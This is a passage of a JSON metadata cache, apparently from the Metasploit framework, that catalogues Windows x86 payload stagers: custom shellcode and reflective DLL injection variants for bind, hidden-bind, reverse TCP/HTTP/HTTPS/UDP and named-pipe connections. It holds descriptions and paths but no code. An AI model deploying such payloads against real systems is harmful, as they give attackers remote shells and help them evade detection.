"payload/windows/custom/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/custom/bind_hidden_tcp": { - "name": "Windows shellcode stage, Hidden Bind TCP Stager", - "fullname": "payload/windows/custom/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/custom/bind_ipv6_tcp": { - "name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/custom/bind_ipv6_tcp_uuid": { - "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/custom/bind_named_pipe": { - "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "UserExistsError" - ], - "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/custom/bind_nonx_tcp": { - "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "vlad902 " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/custom/bind_tcp": { - "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/custom/bind_tcp_rc4": { - "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/custom/bind_tcp_uuid": { - "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/custom/find_tag": { - "name": "Windows shellcode stage, Find Tag Ordinal Stager", - "fullname": "payload/windows/custom/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "skape " - ], - "description": "Custom shellcode stage.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/custom/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/custom/reverse_http": { - "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/custom/reverse_http_proxy_pstore": { - "name": "Windows shellcode stage, Reverse HTTP Stager Proxy", - "fullname": "payload/windows/custom/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/custom/reverse_https": { - "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/windows/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_https" - }, - "payload_windows/custom/reverse_ipv6_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/custom/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/custom/reverse_named_pipe": { - "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/custom/reverse_nonx_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "vlad902 " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/custom/reverse_ord_tcp": { - "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/custom/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "spoonm " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/custom/reverse_tcp": { - "name": "Windows shellcode stage, Reverse TCP Stager", - "fullname": "payload/windows/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/custom/reverse_tcp_allports": { - "name": "Windows shellcode stage, Reverse All-Port TCP Stager", - "fullname": "payload/windows/custom/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/custom/reverse_tcp_dns": { - "name": "Windows shellcode stage, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/custom/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/custom/reverse_tcp_rc4": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/custom/reverse_tcp_rc4_dns": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/custom/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/custom/reverse_tcp_uuid": { - "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/custom/reverse_udp": { - "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/custom/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "RageLtMan " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/custom/reverse_winhttp": { - "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/custom/reverse_winhttps": { - "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_windows/dllinject/bind_hidden_ipknock_tcp": { - "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/dllinject/bind_hidden_tcp": { - "name": "Reflective DLL Injection, Hidden Bind TCP Stager", - "fullname": "payload/windows/dllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/dllinject/bind_ipv6_tcp": { - "name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/dllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/dllinject/bind_ipv6_tcp_uuid": { - "name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/dllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/dllinject/bind_named_pipe": { - "name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/dllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/dllinject/bind_nonx_tcp": { - "name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)", - "fullname": 